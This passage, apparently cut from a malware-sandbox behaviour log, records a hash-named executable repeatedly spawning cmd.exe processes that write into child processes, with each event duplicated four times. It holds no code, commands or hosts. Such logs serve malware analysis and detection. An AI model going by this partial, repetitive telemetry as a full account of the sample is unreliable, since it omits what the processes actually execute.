PID 220 wrote to memory of 1492 220 cmd.exe 511 PID 220 wrote to memory of 1492 220 cmd.exe 511 PID 220 wrote to memory of 1492 220 cmd.exe 511 PID 220 wrote to memory of 1492 220 cmd.exe 511 PID 1492 wrote to memory of 1408 1492 cmd.exe 512 PID 1492 wrote to memory of 1408 1492 cmd.exe 512 PID 1492 wrote to memory of 1408 1492 cmd.exe 512 PID 1492 wrote to memory of 1408 1492 cmd.exe 512 PID 220 wrote to memory of 1488 220 cmd.exe 513 PID 220 wrote to memory of 1488 220 cmd.exe 513 PID 220 wrote to memory of 1488 220 cmd.exe 513 PID 220 wrote to memory of 1488 220 cmd.exe 513 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 514 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 514 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 514 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 514 PID 1776 wrote to memory of 1432 1776 cmd.exe 516 PID 1776 wrote to memory of 1432 1776 cmd.exe 516 PID 1776 wrote to memory of 1432 1776 cmd.exe 516 PID 1776 wrote to memory of 1432 1776 cmd.exe 516 PID 1776 wrote to memory of 1136 1776 cmd.exe 517 PID 1776 wrote to memory of 1136 1776 cmd.exe 517 PID 1776 wrote to memory of 1136 1776 cmd.exe 517 PID 1776 wrote to memory of 1136 1776 cmd.exe 517 PID 1776 wrote to memory of 1584 1776 cmd.exe 518 PID 1776 wrote to memory of 1584 1776 cmd.exe 518 PID 1776 wrote to memory of 1584 1776 cmd.exe 518 PID 1776 wrote to memory of 1584 1776 cmd.exe 518 PID 1584 wrote to memory of 964 1584 cmd.exe 519 PID 1584 wrote to memory of 964 1584 cmd.exe 519 PID 1584 wrote to memory of 964 1584 cmd.exe 519 PID 1584 wrote to memory of 964 1584 cmd.exe 519 PID 1776 wrote to memory of 688 1776 cmd.exe 520 PID 1776 wrote to memory of 688 1776 cmd.exe 520 PID 1776 wrote to memory of 688 1776 cmd.exe 520 PID 1776 wrote to memory of 688 1776 cmd.exe 520 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 521 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 521 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 521 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 521 PID 1960 wrote to memory of 1980 1960 cmd.exe 523 PID 1960 wrote to memory of 1980 1960 cmd.exe 523 PID 1960 wrote to memory of 1980 1960 cmd.exe 523 PID 1960 wrote to memory of 1980 1960 cmd.exe 523 PID 1960 wrote to memory of 1556 1960 cmd.exe 524 PID 1960 wrote to memory of 1556 1960 cmd.exe 524 PID 1960 wrote to memory of 1556 1960 cmd.exe 524 PID 1960 wrote to memory of 1556 1960 cmd.exe 524 PID 1960 wrote to memory of 1168 1960 cmd.exe 525 PID 1960 wrote to memory of 1168 1960 cmd.exe 525 PID 1960 wrote to memory of 1168 1960 cmd.exe 525 PID 1960 wrote to memory of 1168 1960 cmd.exe 525 PID 1168 wrote to memory of 1176 1168 cmd.exe 526 PID 1168 wrote to memory of 1176 1168 cmd.exe 526 PID 1168 wrote to memory of 1176 1168 cmd.exe 526 PID 1168 wrote to memory of 1176 1168 cmd.exe 526 PID 1960 wrote to memory of 2036 1960 cmd.exe 527 PID 1960 wrote to memory of 2036 1960 cmd.exe 527 PID 1960 wrote to memory of 2036 1960 cmd.exe 527 PID 1960 wrote to memory of 2036 1960 cmd.exe 527 PID 616 wrote to memory of 1020 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 528 PID 616 wrote to memory of 1020 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 528 PID 616 wrote to memory of 1020 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 528 PID 616 wrote to memory of 1020 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 528 PID 1020 wrote to memory of 1120 1020 cmd.exe 530 PID 1020 wrote to memory of 1120 1020 cmd.exe 530 PID 1020 wrote to memory of 1120 1020 cmd.exe 530 PID 1020 wrote to memory of 1120 1020 cmd.exe 530 PID 1020 wrote to memory of 860 1020 cmd.exe 531 PID 1020 wrote to memory of 860 1020 cmd.exe 531 PID 1020 wrote to memory of 860 1020 cmd.exe 531 PID 1020 wrote to memory of 860 1020 cmd.exe 531 PID 1020 wrote to memory of 1948 1020 cmd.exe 532 PID 1020 wrote to memory of 1948 1020 cmd.exe 532 PID 1020 wrote to memory of 1948 1020 cmd.exe 532 PID 1020 wrote to memory of 1948 1020 cmd.exe 532 PID 1948 wrote to memory of 1488 1948 cmd.exe 533 PID 1948 wrote to memory of 1488 1948 cmd.exe 533 PID 1948 wrote to memory of 1488 1948 cmd.exe 533 PID 1948 wrote to memory of 1488 1948 cmd.exe 533 PID 1020 wrote to memory of 1828 1020 cmd.exe 534 PID 1020 wrote to memory of 1828 1020 cmd.exe 534 PID 1020 wrote to memory of 1828 1020 cmd.exe 534 PID 1020 wrote to memory of 1828 1020 cmd.exe 534 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 535 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 535 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 535 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 535 PID 948 wrote to memory of 1964 948 cmd.exe 537 PID 948 wrote to memory of 1964 948 cmd.exe 537 PID 948 wrote to memory of 1964 948 cmd.exe 537 PID 948 wrote to memory of 1964 948 cmd.exe 537 PID 948 wrote to memory of 564 948 cmd.exe 538 PID 948 wrote to memory of 564 948 cmd.exe 538 PID 948 wrote to memory of 564 948 cmd.exe 538 PID 948 wrote to memory of 564 948 cmd.exe 538 PID 948 wrote to memory of 1216 948 cmd.exe 539 PID 948 wrote to memory of 1216 948 cmd.exe 539 PID 948 wrote to memory of 1216 948 cmd.exe 539 PID 948 wrote to memory of 1216 948 cmd.exe 539 PID 1216 wrote to memory of 688 1216 cmd.exe 540 PID 1216 wrote to memory of 688 1216 cmd.exe 540 PID 1216 wrote to memory of 688 1216 cmd.exe 540 PID 1216 wrote to memory of 688 1216 cmd.exe 540 PID 948 wrote to memory of 1200 948 cmd.exe 541 PID 948 wrote to memory of 1200 948 cmd.exe 541 PID 948 wrote to memory of 1200 948 cmd.exe 541 PID 948 wrote to memory of 1200 948 cmd.exe 541 PID 616 wrote to memory of 1060 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 542 PID 616 wrote to memory of 1060 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 542 PID 616 wrote to memory of 1060 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 542 PID 616 wrote to memory of 1060 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 542 PID 1060 wrote to memory of 1472 1060 cmd.exe 544 PID 1060 wrote to memory of 1472 1060 cmd.exe 544 PID 1060 wrote to memory of 1472 1060 cmd.exe 544 PID 1060 wrote to memory of 1472 1060 cmd.exe 544 PID 1060 wrote to memory of 1832 1060 cmd.exe 545 PID 1060 wrote to memory of 1832 1060 cmd.exe 545 PID 1060 wrote to memory of 1832 1060 cmd.exe 545 PID 1060 wrote to memory of 1832 1060 cmd.exe 545 PID 1060 wrote to memory of 1684 1060 cmd.exe 546 PID 1060 wrote to memory of 1684 1060 cmd.exe 546 PID 1060 wrote to memory of 1684 1060 cmd.exe 546 PID 1060 wrote to memory of 1684 1060 cmd.exe 546 PID 1684 wrote to memory of 224 1684 cmd.exe 547 PID 1684 wrote to memory of 224 1684 cmd.exe 547 PID 1684 wrote to memory of 224 1684 cmd.exe 547 PID 1684 wrote to memory of 224 1684 cmd.exe 547 PID 1060 wrote to memory of 1232 1060 cmd.exe 548 PID 1060 wrote to memory of 1232 1060 cmd.exe 548 PID 1060 wrote to memory of 1232 1060 cmd.exe 548 PID 1060 wrote to memory of 1232 1060 cmd.exe 548 PID 616 wrote to memory of 1408 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 549 PID 616 wrote to memory of 1408 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 549 PID 616 wrote to memory of 1408 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 549 PID 616 wrote to memory of 1408 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 549 PID 1408 wrote to memory of 1516 1408 cmd.exe 551 PID 1408 wrote to memory of 1516 1408 cmd.exe 551 PID 1408 wrote to memory of 1516 1408 cmd.exe 551 PID 1408 wrote to memory of 1516 1408 cmd.exe 551 PID 1408 wrote to memory of 1488 1408 cmd.exe 552 PID 1408 wrote to memory of 1488 1408 cmd.exe 552 PID 1408 wrote to memory of 1488 1408 cmd.exe 552 PID 1408 wrote to memory of 1488 1408 cmd.exe 552 PID 1408 wrote to memory of 360 1408 cmd.exe 553 PID 1408 wrote to memory of 360 1408 cmd.exe 553 PID 1408 wrote to memory of 360 1408 cmd.exe 553 PID 1408 wrote to memory of 360 1408 cmd.exe 553 PID 360 wrote to memory of 1944 360 cmd.exe 554 PID 360 wrote to memory of 1944 360 cmd.exe 554 PID 360 wrote to memory of 1944 360 cmd.exe 554 PID 360 wrote to memory of 1944 360 cmd.exe 554 PID 1408 wrote to memory of 972 1408 cmd.exe 555 PID 1408 wrote to memory of 972 1408 cmd.exe 555 PID 1408 wrote to memory of 972 1408 cmd.exe 555 PID 1408 wrote to memory of 972 1408 cmd.exe 555 PID 616 wrote to memory of 964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 556 PID 616 wrote to memory of 964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 556 PID 616 wrote to memory of 964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 556 PID 616 wrote to memory of 964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 556 PID 964 wrote to memory of 528 964 cmd.exe 558 PID 964 wrote to memory of 528 964 cmd.exe 558 PID 964 wrote to memory of 528 964 cmd.exe 558 PID 964 wrote to memory of 528 964 cmd.exe 558 PID 964 wrote to memory of 688 964 cmd.exe 559 PID 964 wrote to memory of 688 964 cmd.exe 559 PID 964 wrote to memory of 688 964 cmd.exe 559 PID 964 wrote to memory of 688 964 cmd.exe 559 PID 964 wrote to memory of 1796 964 cmd.exe 560 PID 964 wrote to memory of 1796 964 cmd.exe 560 PID 964 wrote to memory of 1796 964 cmd.exe 560 PID 964 wrote to memory of 1796 964 cmd.exe 560 PID 1796 wrote to memory of 1808 1796 cmd.exe 561 PID 1796 wrote to memory of 1808 1796 cmd.exe 561 PID 1796 wrote to memory of 1808 1796 cmd.exe 561 PID 1796 wrote to memory of 1808 1796 cmd.exe 561 PID 964 wrote to memory of 1996 964 cmd.exe 562 PID 964 wrote to memory of 1996 964 cmd.exe 562 PID 964 wrote to memory of 1996 964 cmd.exe 562 PID 964 wrote to memory of 1996 964 cmd.exe 562 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 563 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 563 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 563 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 563 PID 680 wrote to memory of 1256 680 cmd.exe 565 PID 680 wrote to memory of 1256 680 cmd.exe 565 PID 680 wrote to memory of 1256 680 cmd.exe 565 PID 680 wrote to memory of 1256 680 cmd.exe 565 PID 680 wrote to memory of 224 680 cmd.exe 566 PID 680 wrote to memory of 224 680 cmd.exe 566 PID 680 wrote to memory of 224 680 cmd.exe 566 PID 680 wrote to memory of 224 680 cmd.exe 566 PID 680 wrote to memory of 624 680 cmd.exe 567 PID 680 wrote to memory of 624 680 cmd.exe 567 PID 680 wrote to memory of 624 680 cmd.exe 567 PID 680 wrote to memory of 624 680 cmd.exe 567 PID 624 wrote to memory of 1784 624 cmd.exe 568 PID 624 wrote to memory of 1784 624 cmd.exe 568 PID 624 wrote to memory of 1784 624 cmd.exe 568 PID 624 wrote to memory of 1784 624 cmd.exe 568 PID 680 wrote to memory of 1556 680 cmd.exe 569 PID 680 wrote to memory of 1556 680 cmd.exe 569 PID 680 wrote to memory of 1556 680 cmd.exe 569 PID 680 wrote to memory of 1556 680 cmd.exe 569 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 570 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 570 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 570 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 570 PID 1332 wrote to memory of 1560 1332 cmd.exe 572 PID 1332 wrote to memory of 1560 1332 cmd.exe 572 PID 1332 wrote to memory of 1560 1332 cmd.exe 572 PID 1332 wrote to memory of 1560 1332 cmd.exe 572 PID 1332 wrote to memory of 1944 1332 cmd.exe 573 PID 1332 wrote to memory of 1944 1332 cmd.exe 573 PID 1332 wrote to memory of 1944 1332 cmd.exe 573 PID 1332 wrote to memory of 1944 1332 cmd.exe 573 PID 1332 wrote to memory of 1136 1332 cmd.exe 574 PID 1332 wrote to memory of 1136 1332 cmd.exe 574 PID 1332 wrote to memory of 1136 1332 cmd.exe 574 PID 1332 wrote to memory of 1136 1332 cmd.exe 574 PID 1136 wrote to memory of 972 1136 cmd.exe 575 PID 1136 wrote to memory of 972 1136 cmd.exe 575 PID 1136 wrote to memory of 972 1136 cmd.exe 575 PID 1136 wrote to memory of 972 1136 cmd.exe 575 PID 1332 wrote to memory of 1460 1332 cmd.exe 576 PID 1332 wrote to memory of 1460 1332 cmd.exe 576 PID 1332 wrote to memory of 1460 1332 cmd.exe 576 PID 1332 wrote to memory of 1460 1332 cmd.exe 576 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 577 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 577 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 577 PID 616 wrote to memory of 1776 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 577 PID 1776 wrote to memory of 672 1776 cmd.exe 579 PID 1776 wrote to memory of 672 1776 cmd.exe 579 PID 1776 wrote to memory of 672 1776 cmd.exe 579 PID 1776 wrote to memory of 672 1776 cmd.exe 579 PID 1776 wrote to memory of 796 1776 cmd.exe 580 PID 1776 wrote to memory of 796 1776 cmd.exe 580 PID 1776 wrote to memory of 796 1776 cmd.exe 580 PID 1776 wrote to memory of 796 1776 cmd.exe 580 PID 1776 wrote to memory of 1756 1776 cmd.exe 581 PID 1776 wrote to memory of 1756 1776 cmd.exe 581 PID 1776 wrote to memory of 1756 1776 cmd.exe 581 PID 1776 wrote to memory of 1756 1776 cmd.exe 581 PID 1756 wrote to memory of 1996 1756 cmd.exe 582 PID 1756 wrote to memory of 1996 1756 cmd.exe 582 PID 1756 wrote to memory of 1996 1756 cmd.exe 582 PID 1756 wrote to memory of 1996 1756 cmd.exe 582 PID 1776 wrote to memory of 1340 1776 cmd.exe 583 PID 1776 wrote to memory of 1340 1776 cmd.exe 583 PID 1776 wrote to memory of 1340 1776 cmd.exe 583 PID 1776 wrote to memory of 1340 1776 cmd.exe 583 PID 616 wrote to memory of 2032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 584 PID 616 wrote to memory of 2032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 584 PID 616 wrote to memory of 2032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 584 PID 616 wrote to memory of 2032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 584 PID 2032 wrote to memory of 1980 2032 cmd.exe 586 PID 2032 wrote to memory of 1980 2032 cmd.exe 586 PID 2032 wrote to memory of 1980 2032 cmd.exe 586 PID 2032 wrote to memory of 1980 2032 cmd.exe 586 PID 2032 wrote to memory of 2040 2032 cmd.exe 587 PID 2032 wrote to memory of 2040 2032 cmd.exe 587 PID 2032 wrote to memory of 2040 2032 cmd.exe 587 PID 2032 wrote to memory of 2040 2032 cmd.exe 587 PID 2032 wrote to memory of 908 2032 cmd.exe 588 PID 2032 wrote to memory of 908 2032 cmd.exe 588 PID 2032 wrote to memory of 908 2032 cmd.exe 588 PID 2032 wrote to memory of 908 2032 cmd.exe 588 PID 908 wrote to memory of 1212 908 cmd.exe 589 PID 908 wrote to memory of 1212 908 cmd.exe 589 PID 908 wrote to memory of 1212 908 cmd.exe 589 PID 908 wrote to memory of 1212 908 cmd.exe 589 PID 2032 wrote to memory of 1516 2032 cmd.exe 590 PID 2032 wrote to memory of 1516 2032 cmd.exe 590 PID 2032 wrote to memory of 1516 2032 cmd.exe 590 PID 2032 wrote to memory of 1516 2032 cmd.exe 590 PID 616 wrote to memory of 1560 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 591 PID 616 wrote to memory of 1560 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 591 PID 616 wrote to memory of 1560 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 591 PID 616 wrote to memory of 1560 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 591 PID 1560 wrote to memory of 1408 1560 cmd.exe 593 PID 1560 wrote to memory of 1408 1560 cmd.exe 593 PID 1560 wrote to memory of 1408 1560 cmd.exe 593 PID 1560 wrote to memory of 1408 1560 cmd.exe 593 PID 1560 wrote to memory of 972 1560 cmd.exe 594 PID 1560 wrote to memory of 972 1560 cmd.exe 594 PID 1560 wrote to memory of 972 1560 cmd.exe 594 PID 1560 wrote to memory of 972 1560 cmd.exe 594 PID 1560 wrote to memory of 1964 1560 cmd.exe 595 PID 1560 wrote to memory of 1964 1560 cmd.exe 595 PID 1560 wrote to memory of 1964 1560 cmd.exe 595 PID 1560 wrote to memory of 1964 1560 cmd.exe 595 PID 1964 wrote to memory of 1488 1964 cmd.exe 596 PID 1964 wrote to memory of 1488 1964 cmd.exe 596 PID 1964 wrote to memory of 1488 1964 cmd.exe 596 PID 1964 wrote to memory of 1488 1964 cmd.exe 596 PID 1560 wrote to memory of 1216 1560 cmd.exe 597 PID 1560 wrote to memory of 1216 1560 cmd.exe 597 PID 1560 wrote to memory of 1216 1560 cmd.exe 597 PID 1560 wrote to memory of 1216 1560 cmd.exe 597 PID 616 wrote to memory of 672 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 598 PID 616 wrote to memory of 672 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 598 PID 616 wrote to memory of 672 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 598 PID 616 wrote to memory of 672 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 598 PID 672 wrote to memory of 1996 672 cmd.exe 600 PID 672 wrote to memory of 1996 672 cmd.exe 600 PID 672 wrote to memory of 1996 672 cmd.exe 600 PID 672 wrote to memory of 1996 672 cmd.exe 600 PID 672 wrote to memory of 564 672 cmd.exe 601 PID 672 wrote to memory of 564 672 cmd.exe 601 PID 672 wrote to memory of 564 672 cmd.exe 601 PID 672 wrote to memory of 564 672 cmd.exe 601 PID 672 wrote to memory of 1472 672 cmd.exe 602 PID 672 wrote to memory of 1472 672 cmd.exe 602 PID 672 wrote to memory of 1472 672 cmd.exe 602 PID 672 wrote to memory of 1472 672 cmd.exe 602 PID 1472 wrote to memory of 528 1472 cmd.exe 603 PID 1472 wrote to memory of 528 1472 cmd.exe 603 PID 1472 wrote to memory of 528 1472 cmd.exe 603 PID 1472 wrote to memory of 528 1472 cmd.exe 603 PID 672 wrote to memory of 224 672 cmd.exe 604 PID 672 wrote to memory of 224 672 cmd.exe 604 PID 672 wrote to memory of 224 672 cmd.exe 604 PID 672 wrote to memory of 224 672 cmd.exe 604 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 605 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 605 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 605 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 605 PID 1120 wrote to memory of 368 1120 cmd.exe 607 PID 1120 wrote to memory of 368 1120 cmd.exe 607 PID 1120 wrote to memory of 368 1120 cmd.exe 607 PID 1120 wrote to memory of 368 1120 cmd.exe 607 PID 1120 wrote to memory of 908 1120 cmd.exe 608 PID 1120 wrote to memory of 908 1120 cmd.exe 608 PID 1120 wrote to memory of 908 1120 cmd.exe 608 PID 1120 wrote to memory of 908 1120 cmd.exe 608 PID 1120 wrote to memory of 920 1120 cmd.exe 609 PID 1120 wrote to memory of 920 1120 cmd.exe 609 PID 1120 wrote to memory of 920 1120 cmd.exe 609 PID 1120 wrote to memory of 920 1120 cmd.exe 609 PID 920 wrote to memory of 884 920 cmd.exe 610 PID 920 wrote to memory of 884 920 cmd.exe 610 PID 920 wrote to memory of 884 920 cmd.exe 610 PID 920 wrote to memory of 884 920 cmd.exe 610 PID 1120 wrote to memory of 1944 1120 cmd.exe 611 PID 1120 wrote to memory of 1944 1120 cmd.exe 611 PID 1120 wrote to memory of 1944 1120 cmd.exe 611 PID 1120 wrote to memory of 1944 1120 cmd.exe 611 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 612 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 612 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 612 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 612 PID 1584 wrote to memory of 1332 1584 cmd.exe 614 PID 1584 wrote to memory of 1332 1584 cmd.exe 614 PID 1584 wrote to memory of 1332 1584 cmd.exe 614 PID 1584 wrote to memory of 1332 1584 cmd.exe 614 PID 1584 wrote to memory of 1964 1584 cmd.exe 615 PID 1584 wrote to memory of 1964 1584 cmd.exe 615 PID 1584 wrote to memory of 1964 1584 cmd.exe 615 PID 1584 wrote to memory of 1964 1584 cmd.exe 615 PID 1584 wrote to memory of 688 1584 cmd.exe 616 PID 1584 wrote to memory of 688 1584 cmd.exe 616 PID 1584 wrote to memory of 688 1584 cmd.exe 616 PID 1584 wrote to memory of 688 1584 cmd.exe 616 PID 688 wrote to memory of 360 688 cmd.exe 617 PID 688 wrote to memory of 360 688 cmd.exe 617 PID 688 wrote to memory of 360 688 cmd.exe 617 PID 688 wrote to memory of 360 688 cmd.exe 617 PID 1584 wrote to memory of 1796 1584 cmd.exe 618 PID 1584 wrote to memory of 1796 1584 cmd.exe 618 PID 1584 wrote to memory of 1796 1584 cmd.exe 618 PID 1584 wrote to memory of 1796 1584 cmd.exe 618 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 619 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 619 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 619 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 619 PID 1960 wrote to memory of 1684 1960 cmd.exe 621 PID 1960 wrote to memory of 1684 1960 cmd.exe 621 PID 1960 wrote to memory of 1684 1960 cmd.exe 621 PID 1960 wrote to memory of 1684 1960 cmd.exe 621 PID 1960 wrote to memory of 1472 1960 cmd.exe 622 PID 1960 wrote to memory of 1472 1960 cmd.exe 622 PID 1960 wrote to memory of 1472 1960 cmd.exe 622 PID 1960 wrote to memory of 1472 1960 cmd.exe 622 PID 1960 wrote to memory of 1232 1960 cmd.exe 623 PID 1960 wrote to memory of 1232 1960 cmd.exe 623 PID 1960 wrote to memory of 1232 1960 cmd.exe 623 PID 1960 wrote to memory of 1232 1960 cmd.exe 623 PID 1232 wrote to memory of 1152 1232 cmd.exe 624 PID 1232 wrote to memory of 1152 1232 cmd.exe 624 PID 1232 wrote to memory of 1152 1232 cmd.exe 624 PID 1232 wrote to memory of 1152 1232 cmd.exe 624 PID 1960 wrote to memory of 1556 1960 cmd.exe 625 PID 1960 wrote to memory of 1556 1960 cmd.exe 625 PID 1960 wrote to memory of 1556 1960 cmd.exe 625 PID 1960 wrote to memory of 1556 1960 cmd.exe 625 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 626 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 626 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 626 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 626 PID 952 wrote to memory of 2032 952 cmd.exe 628 PID 952 wrote to memory of 2032 952 cmd.exe 628 PID 952 wrote to memory of 2032 952 cmd.exe 628 PID 952 wrote to memory of 2032 952 cmd.exe 628 PID 952 wrote to memory of 920 952 cmd.exe 629 PID 952 wrote to memory of 920 952 cmd.exe 629 PID 952 wrote to memory of 920 952 cmd.exe 629 PID 952 wrote to memory of 920 952 cmd.exe 629 PID 952 wrote to memory of 1408 952 cmd.exe 630 PID 952 wrote to memory of 1408 952 cmd.exe 630 PID 952 wrote to memory of 1408 952 cmd.exe 630 PID 952 wrote to memory of 1408 952 cmd.exe 630 PID 1408 wrote to memory of 1832 1408 cmd.exe 631 PID 1408 wrote to memory of 1832 1408 cmd.exe 631 PID 1408 wrote to memory of 1832 1408 cmd.exe 631 PID 1408 wrote to memory of 1832 1408 cmd.exe 631 PID 952 wrote to memory of 1136 952 cmd.exe 632 PID 952 wrote to memory of 1136 952 cmd.exe 632 PID 952 wrote to memory of 1136 952 cmd.exe 632 PID 952 wrote to memory of 1136 952 cmd.exe 632 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 633 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 633 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 633 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 633 PID 1332 wrote to memory of 1088 1332 cmd.exe 635 PID 1332 wrote to memory of 1088 1332 cmd.exe 635 PID 1332 wrote to memory of 1088 1332 cmd.exe 635 PID 1332 wrote to memory of 1088 1332 cmd.exe 635 PID 1332 wrote to memory of 1216 1332 cmd.exe 636 PID 1332 wrote to memory of 1216 1332 